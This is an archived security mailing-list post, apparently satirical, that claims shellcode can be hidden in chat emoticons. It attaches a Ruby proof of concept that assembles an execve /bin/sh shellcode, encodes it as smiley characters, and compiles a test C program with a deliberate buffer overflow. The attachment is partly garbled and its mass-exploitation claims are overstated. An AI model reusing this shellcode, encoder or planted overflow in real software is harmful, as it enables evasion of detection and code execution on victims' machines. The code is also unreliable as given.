AOH :: HP Unsorted M :: VA3037.HTM

Massive exploitation of instant messaging applications proved feasible



Massive exploitation of instant messaging applications proved feasible
Massive exploitation of instant messaging applications proved feasible



--Boundary-00=_Ojt0JqDqv+O5XTz
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Yoann Guillot and myself have been assessing the security of instant 
communication applications for a couple of years.
For quite some time now, we have both suspected that it was possible to 
conduct both stealth and massive attacks on popular chat clients such as MSN, 
AIM, Trillian or mIRC.

Today, we have verified our intuition by creating an encoder that can make any 
shellcode look like a smiley. It is possible to encode malicious shellcodes 
in emoticons, leaving exploits indistinguishable from genuine chat messages.

This would make massive attacks against instant messaging applications 
impossible to catch by anti-virus, IDS or similar signature based 
technologies. Moreover, it is possible to conduct attacks with plausible 
deniability.

The potential for mass exploitation is undeniable. We are urging Microsoft, 
AOL and other administrators of popular chat networks to ban smileys 
(especially animated ones) until all the consequences of this attack have 
been understood. Twitter and Facebook are likely vulnerable too, although we 
didn't conduct specific research yet on those networks.

The attached proof of concept program will compile the sample included 
shellcode, encode it into a valid MSN smiley and compile a test C program by 
using metasm. While the example shellcode and the compiled test program are 
both targeting Linux, you can supply any shellcode you want, including a 
Windows one, via the command line.

Please, use as follow:

"apt-get install libc6-dev-i386 mercurial ruby" if required
"hg clone https://metasm.cr0.org/hg/metasm/"
"cd metasm"
put smile.rb in the metasm directory
"ruby ./smile.rb"
"./test.lol"

Enjoy your shell !

-- 
Julien

--Boundary-00=_Ojt0JqDqv+O5XTz
Content-Type: application/x-ruby;
  name="smile.rb"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
	filename="smile.rb"

#!/usr/bin/ruby

# (c) Yoann Guillot 2009
# License: WTFPLv2 (http://sam.zoy.org/wtfpl/) 

require 'metasm'

if ARGV.empty?
	orig = Metasm::Shellcode.assemble(Metasm::Ia32.new, <
 jmp geteip
goteip:
 pop ebx	// argv0
 xor edx, edx	// envp
 push edx
 push ebx
 mov ecx, esp	// argv
 lea eax, [edx+__NR_execve]
 int 80h
geteip:
 call goteip
db "/bin/sh", 0
EOS
else
	# content of the files passed as arguments
	orig = ARGF.read
end

# arbitrary base16 alphabet
smbase = '()<>:-8o;|D[]{} '

# encode the payload
encoded = orig.unpack('C*').map { |chr| smbase[(chr>>4)&15, 1] + smbase[chr&15, 1] }.join

# assemble the decoder stage
# must be loaded&run at base address = 'LOL!'
dec_stage = Metasm::Shellcode.assemble(Metasm::Ia32.new, <
#include 
#include 
#include 
#include 
#include 
#include 

asm(".global 'open' undef");
asm(".global 'close' undef");
asm(".global 'mmap' undef");

void vuln(void)
{
	char buf[128];
	int fd;

	buf[0] = 0;
	for (int i=0 ; i <= sizeof(buf)/16 ; i++)
		/*D  :-O  :*/
		strcat(buf, "LOL!LOL!LOL!LOL!");

	fd = open("sc.lol", O_RDWR);

	int addr = *(int*)buf;
	strcpy(addr, mmap(addr & ~0xfff, 0x2000, PROT_READ|PROT_WRITE,
		MAP_PRIVATE|MAP_FIXED, fd, 0));
	
	close(fd);

}

int main(void)
{
	vuln();
	return 0;
}
EOS

puts "(: You may run ./test.lol to test the shellcode :)"

--Boundary-00=_Ojt0JqDqv+O5XTz--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.